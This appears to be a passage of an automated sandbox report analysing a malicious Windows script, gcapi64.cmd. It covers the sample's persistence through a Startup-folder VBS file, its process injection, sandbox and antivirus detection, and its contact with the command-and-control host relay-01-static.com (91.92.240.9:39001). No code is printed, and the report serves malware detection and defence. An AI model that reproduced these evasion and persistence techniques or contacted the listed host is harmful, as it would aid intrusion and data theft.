                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts131
                    Windows Management Instrumentation                    		111
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		OS Credential Dumping2
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		211
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory123
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    PowerShell                    		2
                    Registry Run Keys / Startup Folder                    		2
                    Registry Run Keys / Startup Folder                    		1
                    Software Packing                    		NTDS221
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture1
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials151
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1497306 Sample: gcapi64.cmd Startdate: 22/08/2024 Architecture: WINDOWS Score: 100 62 relay-01-static.com 2->62 76 Malicious sample detected (through community Yara rule) 2->76 78 Multi AV Scanner detection for submitted file 2->78 80 Sigma detected: Drops script at startup location 2->80 82 7 other signatures 2->82 10 cmd.exe 1 2->10         started        13 wscript.exe 1 2->13         started        signatures3 process4 signatures5 84 Uses cmd line tools excessively to alter registry or file data 10->84 15 gcapi64.cmd.Kwj 20 10->15         started        19 xcopy.exe 2 10->19         started        21 conhost.exe 10->21         started        25 2 other processes 10->25 86 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->86 23 cmd.exe 13->23         started        process6 file7 54 C:\Users\user\...\gcapi64.cmd:Zone.Identifier, ASCII 15->54 dropped 56 C:\Users\user\AppData\Roaming\gcapi64.cmd, Unicode 15->56 dropped 58 C:\Users\user\AppData\Roaming\...\gcapi64.vbs, ASCII 15->58 dropped 66 Drops VBS files to the startup folder 15->66 68 Encrypted powershell cmdline option found 15->68 70 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->70 74 5 other signatures 15->74 27 InstallUtil.exe 1 3 15->27         started        31 powershell.exe 23 15->31         started        60 C:\Users\user\Desktop\gcapi64.cmd.Kwj, PE32+ 19->60 dropped 72 Uses cmd line tools excessively to alter registry or file data 23->72 33 gcapi64.cmd.Kwj 23->33         started        35 xcopy.exe 23->35         started        38 conhost.exe 23->38         started        40 2 other processes 23->40 signatures8 process9 dnsIp10 64 relay-01-static.com 91.92.240.9, 39001, 49734, 49737 THEZONEBG Bulgaria 27->64 88 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 27->88 42 conhost.exe 27->42         started        90 Loading BitLocker PowerShell Module 31->90 44 WmiPrvSE.exe 31->44         started        46 conhost.exe 31->46         started        92 Writes to foreign memory regions 33->92 94 Powershell is started from unusual location (likely to bypass HIPS) 33->94 96 Creates a thread in another existing process (thread injection) 33->96 98 2 other signatures 33->98 48 InstallUtil.exe 33->48         started        52 C:\Users\user\AppData\...\gcapi64.cmd.Kwj, PE32+ 35->52 dropped file11 signatures12 process13 process14 50 conhost.exe 48->50         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    gcapi64.cmd18%VirustotalBrowse
                    gcapi64.cmd13%ReversingLabsText.Trojan.Generic

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj0%ReversingLabs
                    C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj0%VirustotalBrowse
                    C:\Users\user\Desktop\gcapi64.cmd.Kwj0%ReversingLabs
                    C:\Users\user\Desktop\gcapi64.cmd.Kwj0%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    relay-01-static.com4%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://crl.m0%URL Reputationsafe
                    http://crl.m0%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    http://crl.microsoft0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://crl.mic0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                    http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                    http://crl.micft.cMicRosof0%Avira URL Cloudsafe
                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                    https://github.com/Pester/Pester1%VirustotalBrowse
                    https://github.com/mgravell/protobuf-net0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    relay-01-static.com
                    		91.92.240.9
                    		truefalseunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exegcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://crl.mpowershell.exe, 00000006.00000002.1869718181.000001FD23839000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netigcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://stackoverflow.com/q/14436606/23354gcapi64.cmd.Kwj, 00000005.00000002.1852130887.00000258253A8000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2929418209.0000016B88F61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABDA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5D4F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netJgcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5C4D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.microsoftgcapi64.cmd.Kwj, 00000014.00000002.2480838211.00000183C3D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://stackoverflow.com/q/11564914/23354;gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://stackoverflow.com/q/2152978/23354gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exegcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.micpowershell.exe, 00000006.00000002.1869718181.000001FD2387A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netgcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.micft.cMicRosofpowershell.exe, 00000006.00000002.1869718181.000001FD2387A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819044968.000001FD0B451000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABB81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namegcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819044968.000001FD0B451000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2929418209.0000016B890F9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2929418209.0000016B88F61000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABB81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    91.92.240.9
                    		relay-01-static.comBulgaria
                    		34368THEZONEBGfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1497306
                    Start date and time:2024-08-22 11:44:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 5s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:24
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:gcapi64.cmd
                    Detection:MAL
                    Classification:mal100.expl.evad.winCMD@33/16@1/1
                    EGA Information:
                    • Successful, ratio: 20%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .cmd

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target InstallUtil.exe, PID 8052 because it is empty
                    • Execution Graph export aborted for target gcapi64.cmd.Kwj, PID 2640 because it is empty
                    • Execution Graph export aborted for target gcapi64.cmd.Kwj, PID 7544 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7760 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    05:44:58API Interceptor84x Sleep call for process: gcapi64.cmd.Kwj modified
                    05:45:10API Interceptor18x Sleep call for process: powershell.exe modified
                    05:45:17API Interceptor1311315x Sleep call for process: InstallUtil.exe modified
                    10:45:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    91.92.240.9SecuriteInfo.com.Trojan.PackedNET.2147.2308.11865.exeGet hashmaliciousPureLog Stealer, zgRATBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      relay-01-static.comSecuriteInfo.com.Trojan.PackedNET.2147.2308.11865.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                      • 91.92.240.9

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      THEZONEBGSecuriteInfo.com.Exploit.CVE-2017-11882.123.8476.30014.rtfGet hashmaliciousRemcosBrowse
                      • 91.92.241.131
                      Solent inquiry.xlsGet hashmaliciousRemcosBrowse
                      • 91.92.241.131
                      K9PWTHTxcy.dllGet hashmaliciousDanaBotBrowse
                      • 91.92.246.63
                      K9PWTHTxcy.dllGet hashmaliciousDanaBotBrowse
                      • 91.92.246.63
                      ipNkjpa6m0.msiGet hashmaliciousDanaBotBrowse
                      • 91.92.242.111
                      yJYNZgoiNh.msiGet hashmaliciousDanaBot, RHADAMANTHYSBrowse
                      • 91.92.253.167
                      QIkZ7aeVBV.msiGet hashmaliciousDanaBot, RHADAMANTHYSBrowse
                      • 91.92.253.167
                      J6oTAcCqhp.msiGet hashmaliciousDanaBotBrowse
                      • 91.92.242.111
                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.29510.5363.rtfGet hashmaliciousRemcosBrowse
                      • 91.92.241.131
                      PO20082024oman.xlsGet hashmaliciousRemcosBrowse
                      • 91.92.241.131

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwjfed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                        fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousUnknownBrowse
                            BrowserUpdater.lnkGet hashmaliciousUnknownBrowse
                              Updater.lnkGet hashmaliciousUnknownBrowse
                                ZG7UaFRPVW.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                  IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                                    7XU2cRFInT.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                        Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                          C:\Users\user\Desktop\gcapi64.cmd.Kwjfed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                            fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                              file.exeGet hashmaliciousUnknownBrowse
                                                BrowserUpdater.lnkGet hashmaliciousUnknownBrowse
                                                  Updater.lnkGet hashmaliciousUnknownBrowse
                                                    ZG7UaFRPVW.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                      IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        7XU2cRFInT.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                                            Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InstallUtil.exe.log

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):621
                                                              Entropy (8bit):5.361636180307982
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6KhayoDLI4MWuPCU6yVFO5iv:ML9E4KQwKDE4KGKZI6KhRAE4KKUNb
                                                              MD5:1046826584BB384FCAB6BD1EB6AB124E
                                                              SHA1:67659C715440EDB80D1EE39205E3340C535A4772
